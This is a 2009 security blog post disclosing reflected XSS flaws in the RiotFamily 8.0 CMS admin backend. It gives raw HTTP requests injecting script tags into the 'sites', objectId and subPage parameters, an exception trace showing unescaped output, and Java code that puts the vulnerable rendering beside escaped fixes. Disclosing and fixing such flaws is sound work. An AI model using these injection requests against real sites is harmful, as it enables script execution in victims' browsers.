AntiSnatchOr.com - Keep It Simple Stupid


RiotFamily release 8 XSS

antisnatchor — 10 March, 2009 - 20:47

After a few months of security research inactivity, due to lack of time, I'm back guys. These days I'm playing with RiotFamily (release 8.0), a powerful JEE based Content Management System developed by Felix Gnass and open to the public. It is based on rock-stable technologies that we all use when developing Java based web apps, such as Spring, Hibernate, Freemarker, and DWR for Ajax. They made a lot of improvements over the previous version 7, especially in the admin backend. Well, I have the time to run it locally on my Tomcat instance and play a bit looking for security issues... here we go:

1. Reflected XSS in <yourApp>/riot/form/riotUser when adding a new user to the Riot backend. Following is the raw request, complete with the trivial attack vector I've used:
POST /riot8/riot/form/riotUser HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2009010711 Gentoo Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://localhost:8080/riot8/riot/form/riotUser
Cookie: JSESSIONID=DE70D674365E74CDAD6CA176747FD244;
Content-Type: multipart/form-data; boundary=---------------------------169054938890117057438849259
Content-Length: 838
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="id"
aaa
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="name"
aaa
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="email"
aaa@aal.lo
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="p3"
aaa
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="p3-confirm"
aaa
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="sites"
1f67g<sCript>alert(666)</ScriPt>74jhskm3
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="p5"
Save
-----------------------------169054938890117057438849259--
As you can see, we've modified the original POST request (the one that adds a user to the DB), injecting after the value 1 of the form part "sites" (a normal checkbox) a malicious (even if only for test purposes) JavaScript payload that shows a 666 popup. It works even though a java.lang.NumberFormatException is thrown. This is basically the same problem I found in Eclipse BIRT a few months ago (now fixed): the exception trace is not escaped for HTML characters, as you can see here:
java.lang.NumberFormatException: For input string: "1f67g<sCript>alert(666)</ScriPt>74jhskm3"
 at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48)
 at java.lang.Integer.parseInt(Integer.java:456)
 at java.lang.Integer.parseInt(Integer.java:497)
 at org.riotfamily.forms.element.select.AbstractMultiSelectElement.updateSelection(AbstractMultiSelectElement.java:161)
 at org.riotfamily.forms.element.select.AbstractMultiSelectElement.processRequest(AbstractMultiSelectElement.java:141)
 at org.riotfamily.forms.CompositeElement.processRequestCompontents(CompositeElement.java:142)
 at org.riotfamily.forms.CompositeElement.processRequest(CompositeElement.java:131)
 at org.riotfamily.forms.Form.processRequest(Form.java:396)
 at org.riotfamily.forms.Form.processRequest(Form.java:387)
 at org.riotfamily.forms.controller.AbstractFormController.processForm(AbstractFormController.java:239)
 at org.riotfamily.forms.controller.AbstractFormController.handleFormRequest(AbstractFormController.java:132)
 at org.riotfamily.forms.controller.AjaxFormController.handleFormRequest(AjaxFormController.java:69)
 at org.riotfamily.forms.controller.AbstractFormController.handleRequest(AbstractFormController.java:123)
The same problem exists in the path servlet request URI, in the objectId and subPage parameters:
GET /riot8/riot/path?editorId=messageBundleEntry&objectId=1o92<script>alert(1)</script>73j HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2009010711 Gentoo Firefox/3.0.5
[..]
GET /riot8/riot/path?editorId=dbMessages&subPage=importMessagesac210<script>alert(1)</script>748djna HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2009010711 Gentoo Firefox/3.0.5
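To make the defect concrete, here is an added example (my own illustration, not RiotFamily code) of the unescaped error rendering that the stack trace above reveals, beside two hardened variants. The escapeHtml helper, the render methods and the allowedIds list are assumptions for the demonstration, not the framework's API.

```java
import java.util.Arrays;
import java.util.List;

public class ErrorPageEscaping {
    // HTML-escape a value that will be placed in a text node; '&' must go first.
    static String escapeHtml(String s) {
        return s.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
                .replace("\"", "&quot;").replace("'", "&#39;");
    }

    // Vulnerable pattern: the exception text, which embeds the raw request value,
    // is concatenated into the response as markup. This is the behaviour the post describes.
    static String renderErrorUnsafe(Throwable t) {
        return "<pre>" + t + "</pre>";
    }

    // Hardened pattern: escape the text first, so the payload is displayed, not executed.
    static String renderErrorSafe(Throwable t) {
        return "<pre>" + escapeHtml(t.toString()) + "</pre>";
    }

    // Better still: validate the checkbox value against the option ids the form rendered
    // (allowedIds is a hypothetical stand-in for the form's real option list) and keep
    // the rejected input out of the error message altogether.
    static int parseSelection(String value, List<Integer> allowedIds) {
        if (!value.matches("\\d{1,9}")) {
            throw new IllegalArgumentException("selection is not a numeric option id");
        }
        int id = Integer.parseInt(value);
        if (!allowedIds.contains(id)) {
            throw new IllegalArgumentException("selection is not an offered option");
        }
        return id;
    }

    public static void main(String[] args) {
        String sites = "1f67g<sCript>alert(666)</ScriPt>74jhskm3"; // the vector from the post
        try {
            Integer.parseInt(sites);
        } catch (NumberFormatException e) {
            System.out.println(renderErrorUnsafe(e)); // script tags reach the browser intact
            System.out.println(renderErrorSafe(e));   // rendered as &lt;sCript&gt;... instead
        }
        try {
            parseSelection(sites, Arrays.asList(1, 2));
        } catch (IllegalArgumentException e) {
            System.out.println(e.getMessage()); // nothing from the request is echoed
        }
    }
}
```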
Have fun guys... euronymous

RiotFamily release 8 XSS: fast fix!!! | AntiSnatch0r (not verified) — 11 March, 2009 - 15:44

[...] That's what Felix Gnass, the lead developer of RiotFamily, in which we have found security issues, did. [...]

